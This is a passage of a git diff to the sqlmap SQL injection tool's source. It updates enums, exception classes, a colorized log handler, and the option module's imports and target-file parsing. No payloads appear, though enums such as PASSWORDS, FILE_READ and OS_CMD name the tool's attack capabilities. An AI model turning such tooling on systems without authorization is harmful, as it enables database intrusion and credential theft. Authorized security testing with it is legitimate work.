= 17 - COMMON_TABLES = 18 - COMMON_COLUMNS = 19 - FILE_READ = 20 - FILE_WRITE = 21 - OS_CMD = 22 - REG_READ = 23 - -class API_CONTENT_STATUS: + CFM = "cfm" + +class CONTENT_TYPE(object): + TARGET = 0 + TECHNIQUES = 1 + DBMS_FINGERPRINT = 2 + BANNER = 3 + CURRENT_USER = 4 + CURRENT_DB = 5 + HOSTNAME = 6 + IS_DBA = 7 + USERS = 8 + PASSWORDS = 9 + PRIVILEGES = 10 + ROLES = 11 + DBS = 12 + TABLES = 13 + COLUMNS = 14 + SCHEMA = 15 + COUNT = 16 + DUMP_TABLE = 17 + SEARCH = 18 + SQL_QUERY = 19 + COMMON_TABLES = 20 + COMMON_COLUMNS = 21 + FILE_READ = 22 + FILE_WRITE = 23 + OS_CMD = 24 + REG_READ = 25 + STATEMENTS = 26 + +class CONTENT_STATUS(object): IN_PROGRESS = 0 COMPLETE = 1 + +class AUTH_TYPE(object): + BASIC = "basic" + DIGEST = "digest" + BEARER = "bearer" + NTLM = "ntlm" + PKI = "pki" + +class AUTOCOMPLETE_TYPE(object): + SQL = 0 + OS = 1 + SQLMAP = 2 + API = 3 + +class NOTE(object): + FALSE_POSITIVE_OR_UNEXPLOITABLE = "false positive or unexploitable" + +class MKSTEMP_PREFIX(object): + HASHES = "sqlmaphashes-" + CRAWLER = "sqlmapcrawler-" + IPC = "sqlmapipc-" + CONFIG = "sqlmapconfig-" + TESTING = "sqlmaptesting-" + RESULTS = "sqlmapresults-" + COOKIE_JAR = "sqlmapcookiejar-" + BIG_ARRAY = "sqlmapbigarray-" + SPECIFIC_RESPONSE = "sqlmapresponse-" + PREPROCESS = "sqlmappreprocess-" + +class TIMEOUT_STATE(object): + NORMAL = 0 + EXCEPTION = 1 + TIMEOUT = 2 + +class HINT(object): + PREPEND = 0 + APPEND = 1 + +class FUZZ_UNION_COLUMN: + STRING = "" + INTEGER = "" + NULL = "NULL" + +class COLOR: + BLUE = "\033[34m" + BOLD_MAGENTA = "\033[35;1m" + BOLD_GREEN = "\033[32;1m" + BOLD_LIGHT_MAGENTA = "\033[95;1m" + LIGHT_GRAY = "\033[37m" + BOLD_RED = "\033[31;1m" + BOLD_LIGHT_GRAY = "\033[37;1m" + 
YELLOW = "\033[33m" + DARK_GRAY = "\033[90m" + BOLD_CYAN = "\033[36;1m" + LIGHT_RED = "\033[91m" + CYAN = "\033[36m" + MAGENTA = "\033[35m" + LIGHT_MAGENTA = "\033[95m" + LIGHT_GREEN = "\033[92m" + RESET = "\033[0m" + BOLD_DARK_GRAY = "\033[90;1m" + BOLD_LIGHT_YELLOW = "\033[93;1m" + BOLD_LIGHT_RED = "\033[91;1m" + BOLD_LIGHT_GREEN = "\033[92;1m" + LIGHT_YELLOW = "\033[93m" + BOLD_LIGHT_BLUE = "\033[94;1m" + BOLD_LIGHT_CYAN = "\033[96;1m" + LIGHT_BLUE = "\033[94m" + BOLD_WHITE = "\033[97;1m" + LIGHT_CYAN = "\033[96m" + BLACK = "\033[30m" + BOLD_YELLOW = "\033[33;1m" + BOLD_BLUE = "\033[34;1m" + GREEN = "\033[32m" + WHITE = "\033[97m" + BOLD_BLACK = "\033[30;1m" + RED = "\033[31m" + UNDERLINE = "\033[4m" + +class BACKGROUND: + BLUE = "\033[44m" + LIGHT_GRAY = "\033[47m" + YELLOW = "\033[43m" + DARK_GRAY = "\033[100m" + LIGHT_RED = "\033[101m" + CYAN = "\033[46m" + MAGENTA = "\033[45m" + LIGHT_MAGENTA = "\033[105m" + LIGHT_GREEN = "\033[102m" + RESET = "\033[0m" + LIGHT_YELLOW = "\033[103m" + LIGHT_BLUE = "\033[104m" + LIGHT_CYAN = "\033[106m" + BLACK = "\033[40m" + GREEN = "\033[42m" + WHITE = "\033[107m" + RED = "\033[41m" diff --git a/lib/core/exception.py b/lib/core/exception.py index ba21662416e..4d111073dec 100644 --- a/lib/core/exception.py +++ b/lib/core/exception.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ class SqlmapBaseException(Exception): @@ -23,6 +23,9 @@ class SqlmapFilePathException(SqlmapBaseException): class SqlmapGenericException(SqlmapBaseException): pass +class SqlmapInstallationException(SqlmapBaseException): + pass + class SqlmapMissingDependence(SqlmapBaseException): pass @@ -44,12 +47,24 @@ class SqlmapSilentQuitException(SqlmapBaseException): class SqlmapUserQuitException(SqlmapBaseException): pass +class SqlmapShellQuitException(SqlmapBaseException): + pass + +class SqlmapSkipTargetException(SqlmapBaseException): + pass + class SqlmapSyntaxException(SqlmapBaseException): pass +class SqlmapSystemException(SqlmapBaseException): + pass + class SqlmapThreadException(SqlmapBaseException): pass +class SqlmapTokenException(SqlmapBaseException): + pass + class SqlmapUndefinedMethod(SqlmapBaseException): pass diff --git a/lib/core/htmlentities.py b/lib/core/htmlentities.py deleted file mode 100644 index 0304cddc968..00000000000 --- a/lib/core/htmlentities.py +++ /dev/null @@ -1,263 +0,0 @@ -#!/usr/bin/env python - -""" -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission -""" - -# Reference: http://www.w3.org/TR/1999/REC-html401-19991224/sgml/entities.html - -htmlEntities = { - 'quot': 34, - 'amp': 38, - 'lt': 60, - 'gt': 62, - 'nbsp': 160, - 'iexcl': 161, - 'cent': 162, - 'pound': 163, - 'curren': 164, - 'yen': 165, - 'brvbar': 166, - 'sect': 167, - 'uml': 168, - 'copy': 169, - 'ordf': 170, - 'laquo': 171, - 'not': 172, - 'shy': 173, - 'reg': 174, - 'macr': 175, - 'deg': 176, - 'plusmn': 177, - 'sup2': 178, - 'sup3': 179, - 'acute': 180, - 'micro': 181, - 'para': 182, - 'middot': 183, - 'cedil': 184, - 'sup1': 185, - 'ordm': 186, - 'raquo': 187, - 'frac14': 188, - 'frac12': 189, - 'frac34': 190, - 'iquest': 191, - 'Agrave': 192, - 'Aacute': 193, - 'Acirc': 194, - 'Atilde': 195, - 'Auml': 196, - 'Aring': 197, - 'AElig': 198, - 'Ccedil': 199, - 'Egrave': 200, - 'Eacute': 201, - 'Ecirc': 
202, - 'Euml': 203, - 'Igrave': 204, - 'Iacute': 205, - 'Icirc': 206, - 'Iuml': 207, - 'ETH': 208, - 'Ntilde': 209, - 'Ograve': 210, - 'Oacute': 211, - 'Ocirc': 212, - 'Otilde': 213, - 'Ouml': 214, - 'times': 215, - 'Oslash': 216, - 'Ugrave': 217, - 'Uacute': 218, - 'Ucirc': 219, - 'Uuml': 220, - 'Yacute': 221, - 'THORN': 222, - 'szlig': 223, - 'agrave': 224, - 'aacute': 225, - 'acirc': 226, - 'atilde': 227, - 'auml': 228, - 'aring': 229, - 'aelig': 230, - 'ccedil': 231, - 'egrave': 232, - 'eacute': 233, - 'ecirc': 234, - 'euml': 235, - 'igrave': 236, - 'iacute': 237, - 'icirc': 238, - 'iuml': 239, - 'eth': 240, - 'ntilde': 241, - 'ograve': 242, - 'oacute': 243, - 'ocirc': 244, - 'otilde': 245, - 'ouml': 246, - 'divide': 247, - 'oslash': 248, - 'ugrave': 249, - 'uacute': 250, - 'ucirc': 251, - 'uuml': 252, - 'yacute': 253, - 'thorn': 254, - 'yuml': 255, - 'OElig': 338, - 'oelig': 339, - 'Scaron': 352, - 'fnof': 402, - 'scaron': 353, - 'Yuml': 376, - 'circ': 710, - 'tilde': 732, - 'Alpha': 913, - 'Beta': 914, - 'Gamma': 915, - 'Delta': 916, - 'Epsilon': 917, - 'Zeta': 918, - 'Eta': 919, - 'Theta': 920, - 'Iota': 921, - 'Kappa': 922, - 'Lambda': 923, - 'Mu': 924, - 'Nu': 925, - 'Xi': 926, - 'Omicron': 927, - 'Pi': 928, - 'Rho': 929, - 'Sigma': 931, - 'Tau': 932, - 'Upsilon': 933, - 'Phi': 934, - 'Chi': 935, - 'Psi': 936, - 'Omega': 937, - 'alpha': 945, - 'beta': 946, - 'gamma': 947, - 'delta': 948, - 'epsilon': 949, - 'zeta': 950, - 'eta': 951, - 'theta': 952, - 'iota': 953, - 'kappa': 954, - 'lambda': 955, - 'mu': 956, - 'nu': 957, - 'xi': 958, - 'omicron': 959, - 'pi': 960, - 'rho': 961, - 'sigmaf': 962, - 'sigma': 963, - 'tau': 964, - 'upsilon': 965, - 'phi': 966, - 'chi': 967, - 'psi': 968, - 'omega': 969, - 'thetasym': 977, - 'upsih': 978, - 'piv': 982, - 'bull': 8226, - 'hellip': 8230, - 'prime': 8242, - 'Prime': 8243, - 'oline': 8254, - 'frasl': 8260, - 'ensp': 8194, - 'emsp': 8195, - 'thinsp': 8201, - 'zwnj': 8204, - 'zwj': 8205, - 'lrm': 8206, - 'rlm': 8207, - 'ndash': 8211, - 'mdash': 8212, - 'lsquo': 8216, - 'rsquo': 8217, - 'sbquo': 8218, - 'ldquo': 8220, - 'rdquo': 8221, - 'bdquo': 8222, - 'dagger': 8224, - 'Dagger': 8225, - 'permil': 8240, - 'lsaquo': 8249, - 'rsaquo': 8250, - 'euro': 8364, - 'weierp': 8472, - 'image': 8465, - 'real': 8476, - 'trade': 8482, - 'alefsym': 8501, - 'larr': 8592, - 'uarr': 8593, - 'rarr': 8594, - 'darr': 8595, - 'harr': 8596, - 'crarr': 8629, - 'lArr': 8656, - 'uArr': 8657, - 'rArr': 8658, - 'dArr': 8659, - 'hArr': 8660, - 'forall': 8704, - 'part': 8706, - 'exist': 8707, - 'empty': 8709, - 'nabla': 8711, - 'isin': 8712, - 'notin': 8713, - 'ni': 8715, - 'prod': 8719, - 'sum': 8721, - 'minus': 8722, - 'lowast': 8727, - 'radic': 8730, - 'prop': 8733, - 'infin': 8734, - 'ang': 8736, - 'and': 8743, - 'or': 8744, - 'cap': 8745, - 'cup': 8746, - 'int': 8747, - 'there4': 8756, - 'sim': 8764, - 'cong': 8773, - 'asymp': 8776, - 'ne': 8800, - 'equiv': 8801, - 'le': 8804, - 'ge': 8805, - 'sub': 8834, - 'sup': 8835, - 'nsub': 8836, - 'sube': 8838, - 'supe': 8839, - 'oplus': 8853, - 'otimes': 8855, - 'perp': 8869, - 'sdot': 8901, - 'lceil': 8968, - 'rceil': 8969, - 'lfloor': 8970, - 'rfloor': 8971, - 'lang': 9001, - 'rang': 9002, - 'loz': 9674, - 'spades': 9824, - 'clubs': 9827, - 'hearts': 9829, - 'diams': 9830, -} diff --git a/lib/core/log.py b/lib/core/log.py index efd0bd46597..72e2028d191 100644 --- a/lib/core/log.py +++ b/lib/core/log.py @@ -1,11 +1,12 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 
'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import logging +import re import sys from lib.core.enums import CUSTOM_LOGGING @@ -20,10 +21,91 @@ try: from thirdparty.ansistrm.ansistrm import ColorizingStreamHandler - LOGGER_HANDLER = ColorizingStreamHandler(sys.stdout) - LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) - LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) + class _ColorizingStreamHandler(ColorizingStreamHandler): + def colorize(self, message, levelno, force=False): + if levelno in self.level_map and (self.is_tty or force): + bg, fg, bold = self.level_map[levelno] + params = [] + + if bg in self.color_map: + params.append(str(self.color_map[bg] + 40)) + + if fg in self.color_map: + params.append(str(self.color_map[fg] + 30)) + + if bold: + params.append('1') + + if params and message: + match = re.search(r"\A(\s+)", message) + prefix = match.group(1) if match else "" + message = message[len(prefix):] + + match = re.search(r"\[([A-Z ]+)\]", message) # log level + if match: + level = match.group(1) + if message.startswith(self.bold): + message = message.replace(self.bold, "") + reset = self.reset + self.bold + params.append('1') + else: + reset = self.reset + message = message.replace(level, ''.join((self.csi, ';'.join(params), 'm', level, reset)), 1) + + match = re.search(r"\A\s*\[([\d:]+)\]", message) # time + if match: + time = match.group(1) + message = message.replace(time, ''.join((self.csi, str(self.color_map["cyan"] + 30), 'm', time, self._reset(message))), 1) + + match = re.search(r"\[(#\d+)\]", message) # counter + if match: + counter = match.group(1) + message = message.replace(counter, ''.join((self.csi, str(self.color_map["yellow"] + 30), 'm', counter, self._reset(message))), 1) + + if level != "PAYLOAD": + if any(_ in message for _ in ("parsed DBMS error message",)): + match = re.search(r": '(.+)'", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + match = re.search(r"\bresumed: '(.+\.\.\.)", message) + if match: + string = match.group(1) + message = message.replace("'%s" % string, "'%s" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + match = re.search(r" \('(.+)'\)\Z", message) or re.search(r"output: '(.+)'\Z", message) + if match: + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + for match in re.finditer(r"[^\w]'([^']+)'", message): # single-quoted + string = match.group(1) + message = message.replace("'%s'" % string, "'%s'" % ''.join((self.csi, str(self.color_map["white"] + 30), 'm', string, self._reset(message))), 1) + else: + message = ''.join((self.csi, ';'.join(params), 'm', message, self.reset)) + + if prefix: + message = "%s%s" % (prefix, message) + + message = message.replace("%s]" % self.bold, "]%s" % self.bold) # dirty patch + + return message + + disableColor = False + + for argument in sys.argv: + if "disable-col" in argument: + disableColor = True + break + + if disableColor: + LOGGER_HANDLER = logging.StreamHandler(sys.stdout) + else: + 
LOGGER_HANDLER = _ColorizingStreamHandler(sys.stdout) + LOGGER_HANDLER.level_map[logging.getLevelName("PAYLOAD")] = (None, "cyan", False) + LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC OUT")] = (None, "magenta", False) + LOGGER_HANDLER.level_map[logging.getLevelName("TRAFFIC IN")] = ("magenta", None, False) except ImportError: LOGGER_HANDLER = logging.StreamHandler(sys.stdout) @@ -31,4 +113,4 @@ LOGGER_HANDLER.setFormatter(FORMATTER) LOGGER.addHandler(LOGGER_HANDLER) -LOGGER.setLevel(logging.WARN) +LOGGER.setLevel(logging.INFO) diff --git a/lib/core/option.py b/lib/core/option.py index 39476b55975..75981997f80 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -1,349 +1,182 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ -import cookielib +from __future__ import division + +import codecs +import collections +import functools +import glob import inspect +import json import logging import os +import random import re import socket -import string import sys -import sqlite3 +import tempfile import threading import time -import urllib2 -import urlparse - -import lib.core.common -import lib.core.threads -import lib.core.convert +import traceback from lib.controller.checks import checkConnection from lib.core.common import Backend from lib.core.common import boldifyMessage +from lib.core.common import checkFile from lib.core.common import dataToStdout -from lib.core.common import getPublicTypeMembers -from lib.core.common import extractRegexResult -from lib.core.common import filterStringValue +from lib.core.common import decodeStringEscape +from lib.core.common import fetchRandomAgent +from lib.core.common import filterNone +from lib.core.common import findLocalPort from lib.core.common import findPageForms from lib.core.common import getConsoleWidth from lib.core.common import getFileItems from lib.core.common import getFileType -from lib.core.common import getUnicode -from lib.core.common import isListLike +from lib.core.common import getPublicTypeMembers +from lib.core.common import getSafeExString +from lib.core.common import intersect from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import openFile +from lib.core.common import parseRequestFile from lib.core.common import parseTargetDirect -from lib.core.common import parseTargetUrl from lib.core.common import paths -from lib.core.common import randomRange from lib.core.common import randomStr +from lib.core.common import readCachedFileContent from lib.core.common import readInput from lib.core.common import resetCookieJar from lib.core.common import runningAsAdmin -from lib.core.common import sanitizeStr +from lib.core.common import safeExpandUser +from lib.core.common import safeFilepathEncode +from lib.core.common import saveConfig +from lib.core.common import setColor from lib.core.common import setOptimize from lib.core.common import setPaths from lib.core.common import singleTimeWarnMessage -from lib.core.common import UnicodeRawConfigParser from lib.core.common import urldecode -from lib.core.common import urlencode -from lib.core.convert import base64pickle -from lib.core.convert import base64unpickle +from lib.core.compat import cmp +from lib.core.compat import round +from lib.core.compat import xrange +from lib.core.convert import getUnicode from 
lib.core.data import conf from lib.core.data import kb from lib.core.data import logger +from lib.core.data import mergedOptions from lib.core.data import queries from lib.core.datatype import AttribDict from lib.core.datatype import InjectionDict +from lib.core.datatype import LRUDict +from lib.core.datatype import OrderedSet from lib.core.defaults import defaults from lib.core.dicts import DBMS_DICT from lib.core.dicts import DUMP_REPLACEMENTS from lib.core.enums import ADJUST_TIME_DELAY +from lib.core.enums import AUTH_TYPE from lib.core.enums import CUSTOM_LOGGING from lib.core.enums import DUMP_FORMAT -from lib.core.enums import HTTPHEADER +from lib.core.enums import FORK +from lib.core.enums import HTTP_HEADER from lib.core.enums import HTTPMETHOD +from lib.core.enums import MKSTEMP_PREFIX from lib.core.enums import MOBILES +from lib.core.enums import OPTION_TYPE from lib.core.enums import PAYLOAD from lib.core.enums import PRIORITY from lib.core.enums import PROXY_TYPE from lib.core.enums import REFLECTIVE_COUNTER from lib.core.enums import WIZARD from lib.core.exception import SqlmapConnectionException +from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException +from lib.core.exception import SqlmapInstallationException from lib.core.exception import SqlmapMissingDependence from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapMissingPrivileges from lib.core.exception import SqlmapSilentQuitException from lib.core.exception import SqlmapSyntaxException +from lib.core.exception import SqlmapSystemException from lib.core.exception import SqlmapUnsupportedDBMSException from lib.core.exception import SqlmapUserQuitException +from lib.core.exception import SqlmapValueException from lib.core.log import FORMATTER from lib.core.optiondict import optDict -from lib.core.purge import purge -from lib.core.settings import ACCESS_ALIASES -from lib.core.settings import BURP_REQUEST_REGEX from lib.core.settings import CODECS_LIST_PAGE -from lib.core.settings import CRAWL_EXCLUDE_EXTENSIONS from lib.core.settings import CUSTOM_INJECTION_MARK_CHAR -from lib.core.settings import DB2_ALIASES +from lib.core.settings import DBMS_ALIASES from lib.core.settings import DEFAULT_GET_POST_DELIMITER from lib.core.settings import DEFAULT_PAGE_ENCODING from lib.core.settings import DEFAULT_TOR_HTTP_PORTS -from lib.core.settings import DEFAULT_TOR_SOCKS_PORT -from lib.core.settings import FIREBIRD_ALIASES -from lib.core.settings import INJECT_HERE_MARK +from lib.core.settings import DEFAULT_TOR_SOCKS_PORTS +from lib.core.settings import DEFAULT_USER_AGENT +from lib.core.settings import DUMMY_URL +from lib.core.settings import IGNORE_CODE_WILDCARD from lib.core.settings import IS_WIN +from lib.core.settings import KB_CHARS_BOUNDARY_CHAR +from lib.core.settings import KB_CHARS_LOW_FREQUENCY_ALPHABET from lib.core.settings import LOCALHOST -from lib.core.settings import MAXDB_ALIASES +from lib.core.settings import MAX_CONNECT_RETRIES from lib.core.settings import MAX_NUMBER_OF_THREADS -from lib.core.settings import MSSQL_ALIASES -from lib.core.settings import MYSQL_ALIASES from lib.core.settings import NULL -from lib.core.settings import ORACLE_ALIASES from lib.core.settings import PARAMETER_SPLITTING_REGEX -from lib.core.settings import PGSQL_ALIASES -from lib.core.settings import SITE -from lib.core.settings import SQLITE_ALIASES +from lib.core.settings import 
PRECONNECT_CANDIDATE_TIMEOUT +from lib.core.settings import PROXY_ENVIRONMENT_VARIABLES +from lib.core.settings import SOCKET_PRE_CONNECT_QUEUE_SIZE +from lib.core.settings import SQLMAP_ENVIRONMENT_PREFIX from lib.core.settings import SUPPORTED_DBMS from lib.core.settings import SUPPORTED_OS -from lib.core.settings import SYBASE_ALIASES from lib.core.settings import TIME_DELAY_CANDIDATES -from lib.core.settings import UNENCODED_ORIGINAL_VALUE -from lib.core.settings import UNION_CHAR_REGEX from lib.core.settings import UNKNOWN_DBMS_VERSION from lib.core.settings import URI_INJECTABLE_REGEX -from lib.core.settings import VERSION_STRING -from lib.core.settings import WEBSCARAB_SPLITTER from lib.core.threads import getCurrentThreadData +from lib.core.threads import setDaemon from lib.core.update import update from lib.parse.configfile import configFileParser +from lib.parse.payloads import loadBoundaries from lib.parse.payloads import loadPayloads from lib.request.basic import checkCharEncoding +from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler +from lib.request.chunkedhandler import ChunkedHandler from lib.request.connect import Connect as Request from lib.request.dns import DNSServer -from lib.request.basicauthhandler import SmartHTTPBasicAuthHandler -from lib.request.certhandler import HTTPSCertAuthHandler from lib.request.httpshandler import HTTPSHandler +from lib.request.pkihandler import HTTPSPKIAuthHandler from lib.request.rangehandler import HTTPRangeHandler from lib.request.redirecthandler import SmartRedirectHandler -from lib.request.templates import getPageTemplate -from lib.utils.api import setRestAPILog from lib.utils.crawler import crawl from lib.utils.deps import checkDependencies -from lib.utils.google import Google -from thirdparty.colorama.initialise import init as coloramainit +from lib.utils.har import HTTPCollectorFactory +from lib.utils.purge import purge +from lib.utils.search import search +from thirdparty import six from thirdparty.keepalive import keepalive -from thirdparty.oset.pyoset import oset +from thirdparty.multipart import multipartpost +from thirdparty.six.moves import collections_abc as _collections +from thirdparty.six.moves import http_client as _http_client +from thirdparty.six.moves import http_cookiejar as _http_cookiejar +from thirdparty.six.moves import urllib as _urllib from thirdparty.socks import socks from xml.etree.ElementTree import ElementTree -authHandler = urllib2.BaseHandler() +authHandler = _urllib.request.BaseHandler() +chunkedHandler = ChunkedHandler() httpsHandler = HTTPSHandler() keepAliveHandler = keepalive.HTTPHandler() -proxyHandler = urllib2.BaseHandler() +proxyHandler = _urllib.request.ProxyHandler() redirectHandler = SmartRedirectHandler() rangeHandler = HTTPRangeHandler() +multipartPostHandler = multipartpost.MultipartPostHandler() -def _urllib2Opener(): - """ - This function creates the urllib2 OpenerDirector. 
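[Editor's aside] The module-level handlers instantiated above are what the opener-building code in this hunk (the removed _urllib2Opener() and, later, _setHTTPHandlers()) chains together and installs globally. A minimal standalone sketch of that composition pattern, using only the Python 3 standard library; the function and variable names here are illustrative, not sqlmap's:

    import http.cookiejar
    import urllib.request

    def build_opener_with_cookies(proxies=None):
        # Each handler contributes one capability; build_opener() chains them.
        handlers = []
        if proxies:  # e.g. {"http": "127.0.0.1:8080", "https": "127.0.0.1:8080"}
            handlers.append(urllib.request.ProxyHandler(proxies))
        cookie_jar = http.cookiejar.CookieJar()
        handlers.append(urllib.request.HTTPCookieProcessor(cookie_jar))
        opener = urllib.request.build_opener(*handlers)
        opener.addheaders = []  # drop the default "Python-urllib/X.Y" User-Agent
        urllib.request.install_opener(opener)  # plain urlopen() calls now use it
        return opener, cookie_jar

    opener, jar = build_opener_with_cookies()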
- """ - - debugMsg = "creating HTTP requests opener object" - logger.debug(debugMsg) - - handlers = [proxyHandler, authHandler, redirectHandler, rangeHandler, httpsHandler] - - if not conf.dropSetCookie: - if not conf.loadCookies: - conf.cj = cookielib.CookieJar() - else: - conf.cj = cookielib.MozillaCookieJar() - resetCookieJar(conf.cj) - - handlers.append(urllib2.HTTPCookieProcessor(conf.cj)) - - # Reference: http://www.w3.org/Protocols/rfc2616/rfc2616-sec8.html - if conf.keepAlive: - warnMsg = "persistent HTTP(s) connections, Keep-Alive, has " - warnMsg += "been disabled because of its incompatibility " - - if conf.proxy: - warnMsg += "with HTTP(s) proxy" - logger.warn(warnMsg) - elif conf.aType: - warnMsg += "with authentication methods" - logger.warn(warnMsg) - else: - handlers.append(keepAliveHandler) - - opener = urllib2.build_opener(*handlers) - urllib2.install_opener(opener) - -def _feedTargetsDict(reqFile, addedTargetUrls): - """ - Parses web scarab and burp logs and adds results to the target url list - """ - - def _parseWebScarabLog(content): - """ - Parses web scarab logs (POST method not supported) - """ - - reqResList = content.split(WEBSCARAB_SPLITTER) - - for request in reqResList: - url = extractRegexResult(r"URL: (?P.+?)\n", request, re.I) - method = extractRegexResult(r"METHOD: (?P.+?)\n", request, re.I) - cookie = extractRegexResult(r"COOKIE: (?P.+?)\n", request, re.I) - - if not method or not url: - logger.debug("not a valid WebScarab log data") - continue - - if method.upper() == HTTPMETHOD.POST: - warnMsg = "POST requests from WebScarab logs aren't supported " - warnMsg += "as their body content is stored in separate files. " - warnMsg += "Nevertheless you can use -r to load them individually." - logger.warning(warnMsg) - continue - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, None, cookie)) - addedTargetUrls.add(url) - - def _parseBurpLog(content): - """ - Parses burp logs - """ - - if not re.search(BURP_REQUEST_REGEX, content, re.I | re.S): - reqResList = [content] - else: - reqResList = re.finditer(BURP_REQUEST_REGEX, content, re.I | re.S) - - for match in reqResList: - request = match if isinstance(match, basestring) else match.group(0) - - schemePort = re.search(r"(http[\w]*)\:\/\/.*?\:([\d]+).+?={10,}", request, re.I | re.S) - - if schemePort: - scheme = schemePort.group(1) - port = schemePort.group(2) - else: - scheme, port = None, None - - if not re.search(r"^[\n]*(GET|POST).*?\sHTTP\/", request, re.I | re.M): - continue - - if re.search(r"^[\n]*(GET|POST).*?\.(%s)\sHTTP\/" % "|".join(CRAWL_EXCLUDE_EXTENSIONS), request, re.I | re.M): - continue - - getPostReq = False - url = None - host = None - method = None - data = None - cookie = None - params = False - newline = None - lines = request.split('\n') - - for line in lines: - newline = "\r\n" if line.endswith('\r') else '\n' - line = line.strip('\r') - if len(line) == 0: - if method == HTTPMETHOD.POST and data is None: - data = "" - params = True - - elif (line.startswith("GET ") or line.startswith("POST ")) and " HTTP/" in line: - if line.startswith("GET "): - index = 4 - else: - index = 5 - - url = line[index:line.index(" HTTP/")] - method = line[:index - 1] - - if "?" in line and "=" in line: - params = True - - getPostReq = True - - # POST parameters - elif data is not None and params: - data += "%s%s" % (line, newline) - - # GET parameters - elif "?" 
in line and "=" in line and ": " not in line: - params = True - - # Headers - elif re.search(r"\A\S+: ", line): - key, value = line.split(": ", 1) - - # Cookie and Host headers - if key.upper() == HTTPHEADER.COOKIE.upper(): - cookie = value - elif key.upper() == HTTPHEADER.HOST.upper(): - if '://' in value: - scheme, value = value.split('://')[:2] - splitValue = value.split(":") - host = splitValue[0] - - if len(splitValue) > 1: - port = filterStringValue(splitValue[1], "[0-9]") - - # Avoid to add a static content length header to - # conf.httpHeaders and consider the following lines as - # POSTed data - if key.upper() == HTTPHEADER.CONTENT_LENGTH.upper(): - params = True - - # Avoid proxy and connection type related headers - elif key not in (HTTPHEADER.PROXY_CONNECTION, HTTPHEADER.CONNECTION): - conf.httpHeaders.append((getUnicode(key), getUnicode(value))) - - if getPostReq and (params or cookie): - if not port and isinstance(scheme, basestring) and scheme.lower() == "https": - port = "443" - elif not scheme and port == "443": - scheme = "https" - - if conf.forceSSL: - scheme = "https" - port = port or "443" - - if not url.startswith("http"): - url = "%s://%s:%s%s" % (scheme or "http", host, port or "80", url) - scheme = None - port = None - - if not(conf.scope and not re.search(conf.scope, url, re.I)): - if not kb.targets or url not in addedTargetUrls: - kb.targets.add((url, method, data, cookie)) - addedTargetUrls.add(url) - - fp = openFile(reqFile, "rb") - - content = fp.read() - - if conf.scope: - logger.info("using regular expression '%s' for filtering targets" % conf.scope) - - _parseBurpLog(content) - _parseWebScarabLog(content) +# Reference: https://mail.python.org/pipermail/python-list/2009-November/558615.html +try: + WindowsError +except NameError: + WindowsError = None def _loadQueries(): """ @@ -372,7 +205,13 @@ def __contains__(self, name): return retVal tree = ElementTree() - tree.parse(paths.QUERIES_XML) + try: + tree.parse(paths.QUERIES_XML) + except Exception as ex: + errMsg = "something appears to be wrong with " + errMsg += "the file '%s' ('%s'). 
Please make " % (paths.QUERIES_XML, getSafeExString(ex)) + errMsg += "sure that you haven't made any changes to it" + raise SqlmapInstallationException(errMsg) for node in tree.findall("*"): queries[node.attrib['value']] = iterate(node) @@ -384,7 +223,7 @@ def _setMultipleTargets(): """ initialTargetsCount = len(kb.targets) - addedTargetUrls = set() + seen = set() if not conf.logFile: return @@ -396,18 +235,28 @@ def _setMultipleTargets(): errMsg = "the specified list of targets does not exist" raise SqlmapFilePathException(errMsg) - if os.path.isfile(conf.logFile): - _feedTargetsDict(conf.logFile, addedTargetUrls) + if checkFile(conf.logFile, False): + for target in parseRequestFile(conf.logFile): + url, _, data, _, _ = target + key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data)) + if key not in seen: + kb.targets.add(target) + seen.add(key) elif os.path.isdir(conf.logFile): files = os.listdir(conf.logFile) files.sort() for reqFile in files: - if not re.search("([\d]+)\-request", reqFile): + if not re.search(r"([\d]+)\-request", reqFile): continue - _feedTargetsDict(os.path.join(conf.logFile, reqFile), addedTargetUrls) + for target in parseRequestFile(os.path.join(conf.logFile, reqFile)): + url, _, data, _, _ = target + key = re.sub(r"(\w+=)[^%s ]*" % (conf.paramDel or DEFAULT_GET_POST_DELIMITER), r"\g<1>", "%s %s" % (url, data)) + if key not in seen: + kb.targets.add(target) + seen.add(key) else: errMsg = "the specified list of targets is not a file " @@ -418,7 +267,8 @@ def _setMultipleTargets(): if updatedTargetsCount > initialTargetsCount: infoMsg = "sqlmap parsed %d " % (updatedTargetsCount - initialTargetsCount) - infoMsg += "testable requests from the targets list" + infoMsg += "(parameter unique) requests from the " + infoMsg += "targets list ready to be tested" logger.info(infoMsg) def 